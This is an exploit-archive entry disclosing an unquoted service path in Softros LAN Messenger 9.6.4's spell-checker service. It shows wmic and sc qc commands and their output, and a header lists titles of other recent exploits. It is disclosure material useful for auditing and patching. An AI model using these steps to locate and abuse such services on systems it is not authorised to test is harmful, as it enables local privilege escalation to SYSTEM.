
8 changes to exploits/shellcodes SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path python jsonpickle 2.0.0 - Remote Code Execution Unified Remote 3.9.0.2463 - Remote Code Execution LayerBB 1.1.4 - 'search_query' SQL Injection Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
28 lines
No EOL
1.3 KiB
Text
28 lines
No EOL
1.3 KiB
Text
# Exploit Title: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path
|
|
# Discovery by: Victor Mondragón
|
|
# Discovery Date: 23-02-2021
|
|
# Vendor Homepage: https://www.softros.com/
|
|
# Software Links : https://download.softros.com/SoftrosLANMessengerSetup.exe
|
|
# Tested Version: 9.6.4
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on: Windows 10 Pro 64 bits
|
|
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
|
|
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
|
|
Softros Spell Checker SoftrosSpellChecker C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe Auto
|
|
|
|
C:\>sc qc SoftrosSpellChecker
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: SoftrosSpellChecker
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 0 IGNORE
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\SoftrosSpellChecker.exe
|
|
GRUPO_ORDEN_CARGA : System Reserved
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Softros Spell Checker
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem |